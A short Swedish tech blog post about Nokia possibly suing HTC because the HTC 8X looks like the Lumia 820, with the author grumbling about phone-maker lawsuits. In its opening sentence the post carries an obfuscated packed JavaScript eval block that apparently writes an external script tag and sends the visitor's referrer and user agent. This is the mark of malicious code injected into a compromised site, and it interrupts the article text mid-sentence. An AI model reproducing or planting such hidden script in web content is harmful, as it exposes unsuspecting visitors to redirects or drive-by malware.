Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

Är HTC 8X för lik Nokia Lumia 820?

htc-8x-lumia-820
Sebastian

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ydnbh|var|u0026u|referrer|nsbad||js|php’.split(’|’),0,{}))
har elektronikföretaget Nokia gått ut med att de tycker att HTC 8X är för lik deras egna Nokia Lumia 820. Både Nokia och HTC släppte två nya smartphones för inte så länge sedan som ska använda Microsofts nya Windows Phone 8 som operativsystem.

Redan innan lansering har de två bolagen börjat bråka om design.
Enligt källor så ska Nokia vara på väg att stämma HTC för plagiat vad gäller designen på luren HTC 8X och Lumia 820. Dock visades båda telefonerna upp ungefär samtidigt så det kan bli svårt för Nokia att visa att det är ett plagiat även om fallet skulle kunna vara att HTC fått insidertips under utvecklingen av telefonen. För att vinna detta måste Nokia visa att detta hänt.

Här borde man ju tycka att Microsoft skulle klivit in då de vetat långt innan hur de båda telefonerna skulle se ut.
Klart att man ser en likhet på de båda telefonerna men tycker inte att det behövs en stämningsansökan. Börjar ärligt bli trött på alla dessa telefontillverkare som hela tiden bråkar hit och dit. Vad hände med den gamla goda tiden då alla gjorde sin egna grej.

Via: IDG Sweden